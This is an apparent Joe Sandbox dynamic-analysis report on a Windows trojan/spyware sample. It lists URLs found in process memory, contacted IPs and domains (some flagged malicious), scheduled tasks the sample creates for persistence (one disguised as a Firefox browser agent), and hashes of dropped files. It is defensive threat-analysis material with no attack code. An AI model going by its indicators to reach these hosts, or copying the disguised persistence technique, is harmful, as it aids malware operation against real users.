                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Renew7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id8Response7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://support.google.com/chrome/?p=plugin_wmp7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2006/02/addressingidentity7D0A.exe, 00000025.00000002.523221943.0000000002B80000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.google.com/chrome/?p=plugin_java7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/06/addressingex7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000006.00000003.285290195.000001F894E30000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15107D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://support.google.com/chrome/?p=plugin_divx7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.tiktok.com/legal/reportsvchost.exe, 00000012.00000003.379191597.000001994C77E000.00000004.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://tempuri.org/Entity/Id13Response7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA17D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000002.309190839.000001F894E3C000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA17D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico7D0A.exe, 00000025.00000002.523953321.0000000002E16000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517387907.0000000003DFA000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.525017087.0000000003BE3000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524467817.0000000002F98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524249981.0000000002ED7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523709480.0000000002D5A000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517036731.0000000003CA7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523453991.0000000002C98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524875989.0000000003B72000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000006.00000003.308076951.000001F894E68000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309305263.000001F894E6A000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2002/12/policy7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000003.285290195.000001F894E30000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://tempuri.org/Entity/Id22Response7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000006.00000002.309257124.000001F894E5C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308273099.000001F894E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search7D0A.exe, 00000025.00000002.523953321.0000000002E16000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517387907.0000000003DFA000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.525017087.0000000003BE3000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524467817.0000000002F98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524249981.0000000002ED7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523709480.0000000002D5A000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517036731.0000000003CA7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523453991.0000000002C98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524875989.0000000003B72000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000012.00000003.379223670.000001994CC02000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.379136182.000001994C7A6000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.379204449.000001994C78F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.379191597.000001994C77E000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.379166777.000001994C7A6000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000006.00000003.308611585.000001F894E4D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308091317.000001F894E48000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issue7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://get.adob7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/spnego7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000002.309257124.000001F894E5C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/sc7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    high

                                                                                                                                                                                                    Contacted IPs

                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                    Public

                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                    188.166.28.199
                                                                                                                                                                                                    unknownNetherlands
                                                                                                                                                                                                    14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                    172.67.139.105
                                                                                                                                                                                                    goo.suUnited States
                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    86.107.197.138
                                                                                                                                                                                                    unknownRomania
                                                                                                                                                                                                    39855MOD-EUNLfalse
                                                                                                                                                                                                    54.38.220.85
                                                                                                                                                                                                    unicupload.topFrance
                                                                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                                                                    162.159.133.233
                                                                                                                                                                                                    cdn.discordapp.comUnited States
                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    144.76.136.153
                                                                                                                                                                                                    transfer.shGermany
                                                                                                                                                                                                    24940HETZNER-ASDEfalse
                                                                                                                                                                                                    94.142.143.91
                                                                                                                                                                                                    host-data-coin-11.comRussian Federation
                                                                                                                                                                                                    35196IHOR-ASRUfalse
                                                                                                                                                                                                    185.233.81.115
                                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                                    50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                                                                    185.7.214.171
                                                                                                                                                                                                    unknownFrance
                                                                                                                                                                                                    42652DELUNETDEtrue
                                                                                                                                                                                                    185.186.142.166
                                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                                    204490ASKONTELRUtrue
                                                                                                                                                                                                    141.8.194.74
                                                                                                                                                                                                    a0621298.xsph.ruRussian Federation
                                                                                                                                                                                                    35278SPRINTHOSTRUfalse

                                                                                                                                                                                                    Private

                                                                                                                                                                                                    IP
                                                                                                                                                                                                    192.168.2.1

                                                                                                                                                                                                    General Information

                                                                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                                    Analysis ID:553015
                                                                                                                                                                                                    Start date:14.01.2022
                                                                                                                                                                                                    Start time:04:57:29
                                                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                    Overall analysis duration:0h 14m 40s
                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                    Report type:light
                                                                                                                                                                                                    Sample file name:eIxMVDoQF3.exe
                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                    Number of analysed new started processes analysed:45
                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                    Number of injected processes analysed:2
                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                    • HDC enabled
                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@44/29@81/12
                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                    HDC Information:
                                                                                                                                                                                                    • Successful, ratio: 11.4% (good quality ratio 8.3%)
                                                                                                                                                                                                    • Quality average: 55.2%
                                                                                                                                                                                                    • Quality standard deviation: 39.9%
                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                    • Successful, ratio: 63%
                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                    Warnings:
                                                                                                                                                                                                    Show All
                                                                                                                                                                                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                    • HTTP Packets have been reduced
                                                                                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.4.86, 40.91.112.76, 20.54.110.249, 20.42.73.29
                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, patmushta.info, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, yabynennet.xyz, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, api.ip.sb, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                    04:58:59Task SchedulerRun new task: Firefox Default Browser Agent BDC112E0E00B58A5 path: C:\Users\user\AppData\Roaming\rwjfsvd
                                                                                                                                                                                                    04:59:07API Interceptor7x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                    04:59:11API Interceptor1x Sleep call for process: B50.exe modified
                                                                                                                                                                                                    04:59:21API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                    04:59:26API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                                                                    04:59:50Task SchedulerRun new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                                                                                                                                                                                                    05:00:11API Interceptor17x Sleep call for process: 7D0A.exe modified

                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                    IPs

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Domains

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    ASN

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_F805.exe_48ecc3e4e54598c0d23915ff165770ab2c7d13d_b7f76116_14fa801b\Report.wer
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.8138022633057784
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:EfFrOTL6mieOQoJ7R3V6tpXIQcQec6tycEfcw3W+HbHg/8BRTf3o8Fa9iVfOyWYn:KQH6m68HQ0lrjIq/u7sWS274ItL8
                                                                                                                                                                                                    MD5:02F22F60BF93F5956D9E0B210CA151CE
                                                                                                                                                                                                    SHA1:66D6827F797EDCCAA264B81BCC3E7FB909E9100D
                                                                                                                                                                                                    SHA-256:B2C5618F83C491E93A60107D55E2F7519CF031D12FAD4353A29803132981808A
                                                                                                                                                                                                    SHA-512:F0040663174C0B24C1F725009D6453F2176AD5967106EEBED6597098AFB4F22211232C55B7ABE42442E3CCA6F18E0D8A62B265085B4010A45A7573C30CBC07AB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.3.8.7.5.1.8.7.7.0.3.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.3.8.7.6.0.4.2.3.8.8.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.f.d.4.2.7.7.-.8.d.3.6.-.4.9.0.a.-.b.b.0.8.-.5.d.5.2.c.2.6.7.1.2.8.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.c.7.b.0.e.a.-.0.f.c.4.-.4.1.d.d.-.9.7.b.3.-.c.f.0.4.7.5.1.7.1.1.4.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.8.0.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.9.0.-.0.0.0.1.-.0.0.1.c.-.3.3.5.c.-.7.b.8.1.4.6.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.7.e.1.0.0.c.e.7.6.2.1.6.5.7.3.9.6.6.d.e.3.2.6.c.7.b.2.9.c.e.9.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.F.8.0.5...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER96E1.tmp.csv
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):51224
                                                                                                                                                                                                    Entropy (8bit):3.055446752156576
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:k1H13+K4FOAEgDV1/IYMBfI93WldWfY++Rf/rRqmZ62KRo:k1H13+K4FOAEgDV1/IYMBfI93WXWfY+A
                                                                                                                                                                                                    MD5:30677AA5008D33DCAECB6AB887E4085E
                                                                                                                                                                                                    SHA1:CB12B5447C47606A165E115533F3364DB62C1DC6
                                                                                                                                                                                                    SHA-256:8026D4CB18B9EEF279D7CAC11D5D5444EB9763948206F49FB03D5674F87443D4
                                                                                                                                                                                                    SHA-512:E07B3AF9C8A5492CC74E236CF92CB9205CE09D1ED5C0538D8B5CEBB919B56753CEAC122A35A1C0F7BE6BF2937A3B9A1885899BBBBCCE5FCDF3EBF951B4D001CC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BF3.tmp.txt
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                                                    Entropy (8bit):2.6955015547491628
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:9GiZYW1RSmgYuYRWUHBYEZMgt6iXOq+awLXuBxzQa1/g8fI+zI6H3:9jZDWJ7xXTa1YuI+86H3
                                                                                                                                                                                                    MD5:59A12074573B620DCEA59CD4A798F765
                                                                                                                                                                                                    SHA1:6B05ABC99E7D2DAA912409F7EB0CD5508C7758D6
                                                                                                                                                                                                    SHA-256:11D039B4E5777B30DEBD0DD9CA2DEE09C99E98CB03B5C44417ED19BCF45F9EC4
                                                                                                                                                                                                    SHA-512:B89E9258D37BB15B47CE85DA39EB5205D2D20AA00ABBB5D76B7B5E218DB36C451FB78DDD99D763AA622848F273DC755CBE6230C551397CD945FB4183CFCB3207
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
